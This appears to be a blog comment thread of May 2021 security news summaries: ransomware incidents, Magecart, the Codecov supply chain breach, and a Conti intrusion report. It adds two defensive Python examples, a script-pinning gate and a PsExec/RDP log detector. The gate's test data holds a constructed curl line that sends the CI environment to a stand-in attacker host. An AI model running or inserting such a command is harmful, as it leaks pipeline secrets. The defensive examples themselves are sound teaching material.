DarkSide was effectively forced into retreat by alleged law enforcement or unspecified government disruption of the publicity blog and the ransom negotiation dark web site.
Tomi Engdahl says:
https://www.bleepingcomputer.com/news/apple/apple-rejected-over-215-000-apps-in-2020-for-privacy-violations/
Apple says that more than 215,000 iOS apps were blocked by its App Store's App Review team for privacy violations in 2020, while another 150,00 were rejected because they were spamming or misleading iOS users. The company also blocked 48,000 applications from being published on the App Store due to using undocumented or having hidden features. Ninety-five thousand additional apps were also removed from the App Store for using bait-and-switch tactics where new features and capabilities were added to fundamentally change their functionality after being approved.
Tomi Engdahl says:
Brazilian gang defrauds Uber, Lyft, DoorDash using GPS spoofing and stolen IDs https://therecord.media/brazilian-gang-defrauds-uber-lyft-doordash-using-gps-spoofing-and-stolen-ids/
According to court documents obtained by The Record, the gang used stolen IDs to create driver accounts at the aforementioned services, which they later sold to individuals who were not eligible for such accounts. The gang also sold GPS-spoofing tech to drivers that made rides appear longer than they were or food delivery routes shorter in order to obtain increased fares.
Tomi Engdahl says:
[The Irish Health Service Executive] shuts down IT systems amid significant cyber attack
https://www.irishtimes.com/news/health/hse-shuts-down-it-systems-amid-significant-cyber-attack-1.4564957
There has been a significant ransomware attack on the Health Service Executive's (HSE) IT systems. The HSE said it has taken the precaution of shutting down all its IT systems in order to protect them from this attack and to allow us fully assess the situation with our own security partners. Also https://www.theregister.com/2021/05/14/ireland_hse_ransomware_hospital_conti_wizardspider/
https://www.bbc.com/news/world-europe-57111615
https://www.bleepingcomputer.com/news/security/irish-healthcare-shuts-down-it-systems-after-conti-ransomware-attack/
Tomi Engdahl says:
Toshiba unit hacked by DarkSide, conglomerate to undergo strategic review https://www.reuters.com/business/autos-transportation/toshibas-european-business-hit-by-cyberattack-source-2021-05-14/
A Toshiba Corp (6502.T) unit said it was hacked by the DarkSide ransomware group, overshadowing an announcement of a strategic review for the Japanese conglomerate under pressure from activist shareholders to seek out suitors.
Tomi Engdahl says:
DarkSide Ransomware Gang Quits After Servers, Bitcoin Stash Seized https://krebsonsecurity.com/2021/05/darkside-ransomware-gang-quits-after-servers-bitcoin-stash-seized/
Servers were seized (country not named), money of advertisers and founders was transferred to an unknown account, reads a message from a cybercrime forum reposted to the Russian OSINT Telegram channel.
Tomi Engdahl says:
DarkSide ransomware servers reportedly seized, operation shuts down https://www.bleepingcomputer.com/news/security/darkside-ransomware-servers-reportedly-seized-operation-shuts-down/
REvil’s representative, UNKN, states that affiliates are now required first to gain permission to target an organization and that they can no longer target the following entities: 1. Work in the social sector (health care, educational institutions) is prohibited; 2. It is forbidden to work on the gov-sector (state) of any country;
Tomi Engdahl says:
“Open” Access to Industrial Systems Interface is Also Far From Zero
https://isc.sans.edu/diary/rss/27418
I had a look at open port 5900 & 5901 and captured 655K exposed VNC servers. … Based on the sample screenshots below, you realize that many organizations are at risk, and many bad stories like the US pipeline attack will continue to raise in the news…
Tomi Engdahl says:
Magecart Hackers Now hide PHP-Based Backdoor In Website Favicons https://thehackernews.com/2021/05/magecart-hackers-now-hide-php-based.html
Operating with the primary intention of capturing and exfiltrating payment data, Magecart actors have embraced a wide range of attack vectors over the past several months to stay under the radar, avoid detection, and plunder data. From hiding card stealer code inside image metadata and carrying out IDN homograph attacks to plant web skimmers concealed within a website’s favicon file to using Google Analytics and Telegram as an exfiltration channel, the cybercrime syndicate has intensified in its efforts to compromise online stores.
Tomi Engdahl says:
Rapid7 source code, alert data accessed in Codecov supply chain attack https://www.zdnet.com/article/rapid7-source-code-alert-data-accessed-in-codecov-supply-chain-attack/
On April 15, 2021, Codecov, a provider of code coverage solutions, announced a supply chain incident in which a malicious party gained access to Codecov's Bash Uploader script and modified it, enabling the attacker to export data stored in environment variables on Codecov customers' continuous integration (CI) systems to an attacker-controlled server. A small subset of our source code repositories for internal tooling for our MDR service was accessed by an unauthorized party outside of Rapid7. These repositories contained some internal credentials, which have all been rotated, and alert-related data for a subset of our MDR customers
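The uploader in this incident was fetched by CI jobs at run time and executed as-is, so a silent modification on the vendor's side ran everywhere. The defensive control is to pin the digest of a reviewed copy and refuse to run anything else. Below is an added example (not Codecov's or Rapid7's code) of such a gate: a SHA-256 pin check plus a coarse second look at which hosts the script contacts. The two script texts, the host names and `PINNED_SHA256` are constructed for the example; a real pin is the digest of the copy you reviewed.

```python
"""Pin and verify a third-party CI helper script before executing it.

Added example, not Codecov's or Rapid7's code. A CI job that does
`curl ... | bash` on a vendor script trusts whatever is served at that
moment; comparing the fetched bytes against a pinned SHA-256 of the
reviewed version turns a substituted script into a hard failure.
"""
import hashlib
import hmac
import re
from typing import List

# The reviewed script (constructed). In practice this is the file you read and
# approved; only its digest needs to live next to the pipeline config.
KNOWN_GOOD_SCRIPT = (
    "#!/bin/bash\n"
    "curl -sS -F coverage=@coverage.xml https://uploader.example/upload\n"
)
PINNED_SHA256 = hashlib.sha256(KNOWN_GOOD_SCRIPT.encode()).hexdigest()

# A tampered variant in the spirit of the incident described above: one extra
# transfer that ships the job's environment to a host that is not the vendor's.
# Constructed for the example; not the real modification.
TAMPERED_SCRIPT = KNOWN_GOOD_SCRIPT + 'curl -sS -d "$(env)" https://attacker.invalid/collect\n'


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def verify_pinned(script: bytes, pinned: str) -> bool:
    """True only if the fetched script is byte-for-byte the reviewed version."""
    return hmac.compare_digest(sha256_hex(script), pinned)


def outbound_hosts(script: str) -> List[str]:
    """Hostnames appearing in http(s) URLs inside the script, as a review aid."""
    return sorted(set(re.findall(r"https?://([A-Za-z0-9.-]+)", script)))


def unexpected_hosts(script: str, allowed: List[str]) -> List[str]:
    return [h for h in outbound_hosts(script) if h not in allowed]


def gate(script: bytes, pinned: str, allowed_hosts: List[str]) -> List[str]:
    """Return reasons to refuse execution; an empty list means the script may run."""
    reasons = []
    if not verify_pinned(script, pinned):
        reasons.append("sha256 mismatch: script differs from pinned, reviewed version")
    extra = unexpected_hosts(script.decode(errors="replace"), allowed_hosts)
    if extra:
        reasons.append("contacts unexpected host(s): " + ", ".join(extra))
    return reasons


if __name__ == "__main__":
    for label, text in (("reviewed", KNOWN_GOOD_SCRIPT), ("tampered", TAMPERED_SCRIPT)):
        verdict = gate(text.encode(), PINNED_SHA256, ["uploader.example"])
        print(label, "->", "run" if not verdict else "; ".join(verdict))
```

The host check is deliberately secondary: it would miss an exfiltration path that reuses the vendor's own domain or hides the URL, which is why the digest comparison is the control and the host list is only a reviewer's hint. The pin has to be updated deliberately whenever the vendor ships a new version, which is the point: an unreviewed change can no longer run by itself. In a shell-only pipeline the same gate is `sha256sum -c` against the recorded digest before any `bash uploader.sh`.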
Tomi Engdahl says:
Conti Ransomware
https://thedfirreport.com/2021/05/12/conti-ransomware/
In April, we saw a threat actor go from an initial IcedID infection to deploying Conti ransomware domain wide in two days and 11 hours. The threat actors stayed dormant for most of this time, before jumping into action on an early Saturday morning. The hands on keyboard activity lasted for two and a half hours. They utilized RDP, PsExec, and Cobalt Strike to move laterally within the environment before executing Conti in memory across all active systems.
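The lateral-movement tooling named in that write-up leaves recognisable traces in Windows event logs: PsExec installs a service on the target (System log, Event ID 7045, usually named PSEXESVC or executed from an ADMIN$ share), and an RDP session is a Security log 4624 logon with logon type 10. The following is an added example, not The DFIR Report's code, that runs those two detections over constructed sample events and additionally correlates an RDP logon with a suspicious service install on the same host inside a short window, which is the "hands on keyboard" shape described above. The event dicts use simplified field names (`host`, `service`, `image`, `logon_type`) chosen for the example rather than the raw EVTX field names.

```python
"""Spot the PsExec + RDP lateral-movement pattern in Windows event logs.

Added example, not from The DFIR Report. Two detections over constructed,
simplified event records:
  1. a service installed from an ADMIN$ share or named like PsExec's service
     (System log, Event ID 7045);
  2. an RDP logon (Security log, Event ID 4624, logon type 10) followed within
     a short window by such a service install on the same host.
"""
from datetime import datetime, timedelta
from typing import Dict, List

# Constructed sample: a weekend-morning burst on two hosts, plus a benign
# vendor service install two days later that must not be flagged.
SAMPLE_EVENTS: List[Dict] = [
    {"ts": "2021-04-10T05:02:11", "host": "FS01", "id": 4624, "logon_type": 10,
     "user": "CORP\\admin.svc", "src_ip": "10.0.5.23"},
    {"ts": "2021-04-10T05:04:40", "host": "FS01", "id": 7045, "service": "PSEXESVC",
     "image": "%SystemRoot%\\PSEXESVC.exe"},
    {"ts": "2021-04-10T05:06:02", "host": "DC01", "id": 7045, "service": "ogj3kd",
     "image": "\\\\10.0.5.23\\ADMIN$\\ogj3kd.exe"},
    {"ts": "2021-04-12T09:00:00", "host": "WS07", "id": 7045, "service": "Backup Agent",
     "image": "C:\\Program Files\\Vendor\\agent.exe"},
]


def parse_ts(value: str) -> datetime:
    return datetime.fromisoformat(value)


def suspicious_service_install(event: Dict) -> bool:
    """Event ID 7045 whose service name or image path looks like a PsExec-style push."""
    if event.get("id") != 7045:
        return False
    name = event.get("service", "").upper()
    image = event.get("image", "").upper()
    return name == "PSEXESVC" or "\\ADMIN$\\" in image


def rdp_logons(events: List[Dict]) -> List[Dict]:
    """Security 4624 events with logon type 10 (RemoteInteractive, i.e. RDP)."""
    return [e for e in events if e.get("id") == 4624 and e.get("logon_type") == 10]


def detect(events: List[Dict], window: timedelta = timedelta(minutes=15)) -> List[str]:
    """Return one finding per suspicious install, plus one per RDP logon it follows."""
    findings = []
    installs = [e for e in events if suspicious_service_install(e)]
    for inst in installs:
        findings.append(
            f"{inst['host']}: suspicious service install {inst['service']} ({inst['image']})"
        )
    for logon in rdp_logons(events):
        t0 = parse_ts(logon["ts"])
        for inst in installs:
            if inst["host"] != logon["host"]:
                continue
            delta = (parse_ts(inst["ts"]) - t0).total_seconds()
            if 0 <= delta <= window.total_seconds():
                findings.append(
                    f"{logon['host']}: RDP logon by {logon['user']} from {logon['src_ip']} "
                    f"followed by service install {inst['service']} after {int(delta)}s"
                )
    return findings


if __name__ == "__main__":
    for line in detect(SAMPLE_EVENTS):
        print(line)
```

The service-name test is the weak half: PsExec's service name is configurable and clones use random names, which is why the ADMIN$ image path and the RDP-then-install correlation carry more weight. Real 7045 records put the same information in the ServiceName and ImagePath fields, and the window should be tuned to how fast administrators legitimately move in your environment.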
Tomi Engdahl says:
Researchers found three flaws in ACT e-voting system that could affect election outcomes https://www.zdnet.com/article/researchers-find-three-flaws-in-act-e-voting-system-that-could-affect-election-outcomes/
Although system flaws didn’t change the outcome of the ACT’s 2020 election, they could in the future, with four Australian security researchers asking for access to the tech to help prevent such a scenario. “Secretive, unverifiable systems like the ones used in the ACT 2020 election, make it relatively easy to change the recorded list of votes cast, in a way that observers cannot notice,” they said. “It also makes accidental errors more likely to remain undetected.”
Tomi Engdahl says:
April 2021's Most Wanted Malware: Dridex Remains in Top Position Amidst Global Surge in Ransomware Attacks https://blog.checkpoint.com/2021/05/13/april-2021s-most-wanted-malware-dridex-remains-in-top-position-amidst-global-surge-in-ransomware-attacks/
Our latest Global Threat Index for April 2021 has revealed that for the first time, AgentTesla has ranked second in the Index, while the established Dridex trojan is still the most prevalent malware, having risen to the top spot in March after being seventh in February. This month, Dridex, a Trojan that targets the Windows platform, spread via a QuickBooks malspam campaign. The phishing emails used QuickBooks' branding and were trying to lure the user with fake payment notifications and invoices. The email content asked to download a malicious Microsoft Excel attachment that could cause the system to be infected with Dridex.
Tomi Engdahl says:
Using iPhones and AirTags to sneak data out of air-gapped networks https://blog.malwarebytes.com/reports/2021/05/using-iphones-and-airtags-to-sneak-data-out-of-air-gapped-networks/
Someone has found an extraordinary way to exfiltrate data by piggybacking data on the backs of unsuspecting iPhones. A researcher has found out that it is possible to upload arbitrary data from non-internet-connected devices by sending Bluetooth Low Energy (BLE) broadcasts to nearby Apple devices that will happily upload the data for you. To demonstrate their point, they released an ESP32 firmware that turns the micro-controller into an (upload only) modem. They also created a macOS application to retrieve, decode and display the uploaded data.